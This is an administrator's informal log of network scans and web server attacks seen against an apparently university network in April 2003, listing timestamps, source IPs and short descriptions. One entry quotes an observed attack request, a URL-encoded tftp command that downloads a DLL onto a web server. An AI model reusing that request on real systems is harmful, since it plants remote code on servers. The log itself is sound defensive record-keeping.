*SHORT* summary of some of the attacks against us for Apr. 2003 Just too many scans and not enough to keep the list up all the time so some of the more intresting scans, or 1 day samples are here year - time EASTERN source_ip[:port] (dns name, if any) attack/scan/notes 2003/04/01-06:38:13.04 210.23.211.52 (Pacific Internet PH,Dialup Clients,PH) web server attacks 2003/04/01-06:51:50.79 61.147.248.229 (CHINANET jiangsu province network) web server attacks 2003/04/01-06:54:52.38 218.25.25.92 (CHINANET liaoning province network) web server attacks 2003/04/01-06:55:57.43 200.84.180.231 (CANTV Servicios, Venezuela) popup msg sent to pc 2003/04/01-06:56:02.92 200.72.50.99 (somewhere in CHILE) popup msg sent to pc 2003/04/01-07:26:38.71 202.175.51.134 (EPower Integrated Solutions Limited,MO) telent buff overflow to condor as root 2003/04/01-10:06:30.77 200.168.140.116 (200-168-140-116.dsl.telesp.net.br) popup msg sent to pc 2003/04/01-13:14:51.35 213.194.120.253 (ns.turksystems.net) scannet for ports 1080,8080.80,3128 2003/04/01-14:57:27.15 207.188.234.141 (8d.eabccf.client.atlantech.net) scannet for port 1433 2003/04/01-15:08:53.21 195.133.68.1 (Moscow Center Continious Mathematical Education,RU) 1. seems to be on local net. 2003/04/01-15:08:53.21 195.133.68.1 (Moscow Center Continious Mathematical Education,RU) connect to 195.133.68.15 2003/04/01-15:25:51.45 200.161.5.205 (200-161-5-205.dsl.telesp.net.br) popup msg sent to pc 2003/04/01-15:53:25.00 210.22.141.85 (shanghai city,CN) scan web servers for ports 80,8080,1080,3128 2003/04/01-17:17:56.57 80.13.61.81 (ALille-107-1-9-81.abo.wanadoo.fr) scannet for port 1433 2003/04/01-17:17:57.16 80.13.61.81 (ALille-107-1-9-81.abo.wanadoo.fr) scannet ICMP superscan echo 2003/04/01-18:37:42.55 129.194.124.47 (University of Geneva-Ctr,CH) scannet for ports 80,57,21 2003/04/01-18:41:36.31 148.223.19.154 (customer-148-223-19-154.uninet.net.mx) scannet for ports 57,1433 2003/04/01-19:27:24.51 61.147.60.65 (CHINANET jiangsu province yancheng city network) probe 132.235.1.35 : 21 2003/04/01-19:59:13.57 61.147.60.196 (CHINANET jiangsu province yancheng city network) probe 132.235.1.35 : 21 2003/04/01-20:27:46.21 212.21.103.142 (RapidHost Ltd,Part of the Network-i CIDR block,GB)scannet for port 4000 2003/04/01-23:49:38.67 61.177.251.125 (CHINANET jiangsu province network) web server attacks thru 04/02-05:11:39.16 2003/04/02-01:05:41.13 68.165.32.93 (h-68-165-32-93.LSANCA54.covad.net) scannet for port 21 2003/04/02-04:21:34.44 210.125.222.16 (DAEJEON Public Health University,KR) acannet for ports 3072,1024 2003/04/02-05:04:11.41 216.39.48.181 (trek19.sv.av.com) attack web servers 2003/04/02-05:27:40.84 81.53.187.144 (APuteaux-116-1-6-144.abo.wanadoo.fr) scannet for ports 57,1433 2003/04/02-06:00:00.00 0.0.0.0 and as a note, the following are web server attacks (not scans) for 24 hrs on 1 building. 2003/04/02-06:00:00.00 0.0.0.0 and not that the times are off by 4 hours. 2003/04/01-06:31:09.37 61.140.186.91 () attacked 18 web servers 2003/04/01-07:11:33.76 218.25.25.92 () attacked 7 web servers 2003/04/01-07:40:35.08 218.91.24.229 () attacked 1 web servers 2003/04/01-07:47:43.09 61.132.118.119 () attacked 14 web servers 2003/04/01-07:55:20.63 132.248.50.113 () attacked 5 web servers 2003/04/01-08:16:37.29 132.238.187.249 () attacked 2 web servers 2003/04/01-08:18:34.41 61.132.27.162 () attacked 20 web servers 2003/04/01-08:33:50.81 218.19.159.254 () attacked 1 web servers 2003/04/01-11:15:13.04 132.248.213.49 () attacked 3 web servers 2003/04/01-11:16:48.76 61.54.47.213 () attacked 1 web servers 2003/04/01-11:21:33.68 209.88.89.182 () attacked 1 web servers 2003/04/01-11:26:39.41 4.47.34.207 () attacked 1 web servers 2003/04/01-11:27:11.25 200.41.81.21 () attacked 2 web servers 2003/04/01-11:35:09.08 61.147.248.229 () attacked 6 web servers 2003/04/01-11:36:00.31 62.87.239.219 () attacked 1 web servers 2003/04/01-11:38:13.04 210.23.211.52 () attacked 1 web servers 2003/04/01-11:40:35.41 218.244.58.156 () attacked 1 web servers 2003/04/01-11:42:09.85 218.68.218.114 () attacked 1 web servers 2003/04/01-11:42:17.72 61.174.100.206 () attacked 1 web servers 2003/04/01-11:47:03.63 207.248.250.28 () attacked 5 web servers 2003/04/01-11:49:00.99 203.145.155.4 () attacked 1 web servers 2003/04/01-12:22:43.68 218.20.178.5 () attacked 6 web servers 2003/04/01-12:44:25.15 202.101.6.13 () attacked 6 web servers 2003/04/01-13:00:18.28 219.148.193.8 () attacked 1 web servers 2003/04/01-13:08:02.73 200.21.84.104 () attacked 1 web servers 2003/04/01-13:08:47.49 80.194.82.64 () attacked 1 web servers 2003/04/01-13:25:12.65 218.16.70.39 () attacked 2 web servers 2003/04/01-13:46:46.66 218.4.94.218 () attacked 17 web servers 2003/04/01-13:55:31.04 218.0.175.152 () attacked 1 web servers 2003/04/01-14:12:00.18 202.109.184.41 () attacked 1 web servers 2003/04/01-14:25:14.63 61.54.253.53 () attacked 1 web servers 2003/04/01-14:34:38.12 132.248.145.15 () attacked 1 web servers 2003/04/01-14:39:51.63 218.0.176.27 () attacked 1 web servers 2003/04/01-14:49:20.78 200.161.208.147 () attacked 1 web servers 2003/04/01-15:01:54.99 172.179.118.182 () attacked 1 web servers 2003/04/01-15:03:22.87 211.204.49.242 () attacked 1 web servers 2003/04/01-15:13:02.52 80.19.83.196 () attacked 1 web servers 2003/04/01-15:21:10.22 200.41.81.56 () attacked 5 web servers 2003/04/01-15:43:10.23 211.117.13.173 () attacked 1 web servers 2003/04/01-15:46:04.50 200.65.188.228 () attacked 1 web servers 2003/04/01-16:23:50.93 132.195.74.71 () attacked 3 web servers 2003/04/01-16:48:21.19 202.109.94.233 () attacked 6 web servers 2003/04/01-17:10:38.26 132.248.145.22 () attacked 1 web servers 2003/04/01-17:11:37.32 67.97.182.243 () attacked 1 web servers 2003/04/01-17:16:52.12 148.223.128.130 () attacked 1 web servers 2003/04/01-17:16:53.12 132.248.43.24 () attacked 3 web servers 2003/04/01-17:21:20.29 132.248.73.95 () attacked 2 web servers 2003/04/01-17:42:08.71 200.91.209.130 () attacked 1 web servers 2003/04/01-17:55:43.27 218.13.93.177 () attacked 4 web servers 2003/04/01-17:58:27.30 61.170.221.54 () attacked 1 web servers 2003/04/01-18:01:52.93 62.178.253.159 () attacked 1 web servers 2003/04/01-18:13:41.75 132.248.180.115 () attacked 5 web servers 2003/04/01-18:21:28.49 24.172.77.197 () attacked 1 web servers 2003/04/01-18:30:31.24 195.83.122.3 () attacked 1 web servers 2003/04/01-18:33:16.58 81.22.69.200 () attacked 1 web servers 2003/04/01-18:36:02.04 61.145.136.51 () attacked 1 web servers 2003/04/01-18:45:38.59 218.238.119.103 () attacked 1 web servers 2003/04/01-19:15:36.60 211.215.245.219 () attacked 1 web servers 2003/04/01-19:23:13.79 132.248.185.225 () attacked 1 web servers 2003/04/01-19:37:30.37 81.56.156.50 () attacked 1 web servers 2003/04/01-19:39:00.12 61.171.135.153 () attacked 1 web servers 2003/04/01-19:41:40.83 148.245.22.92 () attacked 1 web servers 2003/04/01-19:58:53.68 61.177.54.195 () attacked 3 web servers 2003/04/01-21:01:22.23 202.155.2.226 () attacked 1 web servers 2003/04/01-21:03:51.33 208.167.199.130 () attacked 1 web servers 2003/04/01-21:48:51.38 218.233.206.147 () attacked 1 web servers 2003/04/01-21:50:28.07 132.241.158.44 () attacked 3 web servers 2003/04/01-22:48:31.21 61.177.251.125 () attacked 89 web servers 2003/04/01-22:49:39.63 218.92.0.118 () attacked 1 web servers 2003/04/01-22:51:55.79 218.93.8.233 () attacked 1 web servers 2003/04/01-23:18:23.35 62.178.217.245 () attacked 1 web servers 2003/04/01-23:19:49.90 217.233.31.236 () attacked 1 web servers 2003/04/01-23:31:38.90 200.171.34.108 () attacked 1 web servers 2003/04/01-23:42:57.07 202.57.86.193 () attacked 1 web servers 2003/04/02-00:16:05.34 80.130.86.29 () attacked 1 web servers 2003/04/02-00:30:32.00 132.203.114.152 () attacked 7 web servers 2003/04/02-00:42:50.11 212.170.175.245 () attacked 1 web servers 2003/04/02-00:49:04.17 211.200.211.124 () attacked 1 web servers 2003/04/02-00:51:34.53 218.233.18.139 () attacked 1 web servers 2003/04/02-00:55:16.12 218.50.125.71 () attacked 1 web servers 2003/04/02-00:57:53.49 218.18.13.227 () attacked 1 web servers 2003/04/02-01:00:12.39 218.1.184.93 () attacked 1 web servers 2003/04/02-01:09:41.26 218.235.97.163 () attacked 1 web servers 2003/04/02-01:16:08.20 218.19.91.205 () attacked 1 web servers 2003/04/02-01:32:28.35 61.129.40.120 () attacked 1 web servers 2003/04/02-01:32:52.73 218.92.14.2 () attacked 1 web servers 2003/04/02-01:43:42.05 61.160.70.4 () attacked 2 web servers 2003/04/02-01:53:19.25 61.107.30.4 () attacked 1 web servers 2003/04/02-02:02:41.35 61.144.53.83 () attacked 2 web servers 2003/04/02-02:11:44.46 61.9.71.194 () attacked 1 web servers 2003/04/02-02:31:43.79 218.93.254.102 () attacked 2 web servers 2003/04/02-02:40:29.69 61.160.70.127 () attacked 1 web servers 2003/04/02-02:41:22.79 61.132.25.70 () attacked 1 web servers 2003/04/02-02:42:45.68 151.203.12.236 () attacked 1 web servers 2003/04/02-02:48:00.12 66.140.70.10 () attacked 1 web servers 2003/04/02-02:54:18.43 212.59.25.171 () attacked 1 web servers 2003/04/02-03:09:42.21 210.78.138.229 () attacked 1 web servers 2003/04/02-03:24:36.92 218.2.146.33 () attacked 1 web servers 2003/04/02-03:37:12.42 69.22.205.167 () attacked 1 web servers 2003/04/02-04:02:18.58 218.109.228.66 () attacked 1 web servers 2003/04/02-04:07:25.62 4.62.226.63 () attacked 1 web servers 2003/04/02-04:09:43.73 211.141.130.212 () attacked 1 web servers 2003/04/02-04:23:13.23 61.174.242.196 () attacked 1 web servers 2003/04/02-04:24:39.42 61.151.234.134 () attacked 1 web servers 2003/04/02-04:28:49.61 61.177.68.222 () attacked 1 web servers 2003/04/02-04:32:58.69 218.25.25.113 () attacked 1 web servers 2003/04/02-04:43:12.50 211.102.99.147 () attacked 1 web servers 2003/04/02-04:49:32.10 209.246.71.51 () attacked 1 web servers 2003/04/02-05:05:47.75 61.177.35.179 () attacked 1 web servers 2003/04/02-05:08:19.89 195.166.157.20 () attacked 1 web servers 2003/04/02-05:19:05.79 61.177.208.132 () attacked 1 web servers 2003/04/02-05:21:38.57 218.4.130.130 () attacked 2 web servers 2003/04/02-05:26:12.71 202.56.221.158 () attacked 1 web servers 2003/04/02-05:41:04.24 218.55.130.161 () attacked 1 web servers 2003/04/02-06:15:12.60 61.170.221.77 () attacked 3 web servers 2003/04/02-06:26:49.94 218.144.184.11 () attacked 1 web servers 2003/04/02-06:27:55.33 61.177.67.6 () attacked 1 web servers 2003/04/02-06:36:13.48 61.145.128.93 () attacked 1 web servers 2003/04/02-06:54:57.31 211.167.30.23 () attacked 1 web servers 2003/04/02-07:01:37.67 64.91.40.66 () attacked 1 web servers 2003/04/02-07:07:50.09 203.145.155.31 () attacked 2 web servers 2003/04/02-07:15:59.33 202.65.137.65 () attacked 2 web servers 2003/04/02-07:38:31.99 211.206.189.181 () attacked 1 web servers 2003/04/02-08:05:01.13 218.233.206.108 () attacked 1 web servers 2003/04/02-08:08:20.67 61.129.40.116 () attacked 2 web servers 2003/04/02-08:13:25.29 203.247.9.252 () attacked 1 web servers 2003/04/02-08:19:50.67 202.137.134.82 () attacked 1 web servers 2003/04/02-08:20:02.68 218.72.24.217 () attacked 1 web servers 2003/04/02-08:26:56.59 195.36.241.58 () attacked 1 web servers 2003/04/02-08:33:03.96 218.70.80.80 () attacked 1 web servers 2003/04/02-08:44:06.89 211.215.145.85 () attacked 1 web servers 2003/04/02-08:55:54.68 218.51.180.80 () attacked 1 web servers 2003/04/02-09:23:28.07 218.51.126.210 () attacked 1 web servers 2003/04/02-09:25:25.71 61.54.78.120 () attacked 1 web servers 2003/04/02-09:32:57.02 61.222.228.114 () attacked 1 web servers 2003/04/02-09:38:14.36 61.133.204.93 () attacked 1 web servers 2003/04/02-09:44:00.77 205.160.101.136 () attacked 1 web servers 2003/04/02-09:48:21.92 61.172.249.9 () attacked 1 web servers 2003/04/02-10:08:47.96 200.70.112.127 () attacked 1 web servers 2003/04/03-16:24:31.32 132.235.198.49 (dhcp-198-049.cns.ohiou.edu) scannet for ports 135 445 2003/04/03-17:04:11.71 193.41.67.50 (green-50.bgnet.bg) portscan 132.235.1.1 from 1 - 700,3000-3374,several 8K ports, 2003/04/10-02:39:51.06 x.x.x.x (S.E.Asia) 1. start of large number of UDP packets to 132.235.1.2 (no-one logged on) 2003/04/10-02:39:51.06 x.x.x.x (S.E.Asia) 2. from multiple ips to port 22321 (all length 10) till 02:40 conttns W1W! 2003/04/10-02:39:51.06 x.x.x.x (S.E.Asia) 3. and to 7674 (seemingly 1 english word as data). till 03:31 or so. 2003/04/10-02:39:51.06 x.x.x.x (S.E.Asia) 4. perhaps p2p called harbors? home.postech.ac.kr/~elkarian/cs499/pds/final.ppt 2003/04/10-13:40:12.64 67.86.133.155 (ool-4356859b.dyn.optonline.net) hack into 132.235.18.133 to set up irc bot 2003/04/14-04:06:47.13 218.92.212.80 (CHINANET jiangsu province) web hack as tftp%20-i%20132.235.66.74%20GET%20cool.dll%20c:\httpodbc.dll 2003/04/14-21:48:29.34 200.38.57.226 (Direct Tech, S.A. de C.V.,MX) portscan the entire net, 166 ports per ip 2003/04/24-14:17:05.57 132.235.44.141 (bios name LIBRARY_MILCIRC) portscan net on ports 139,445,21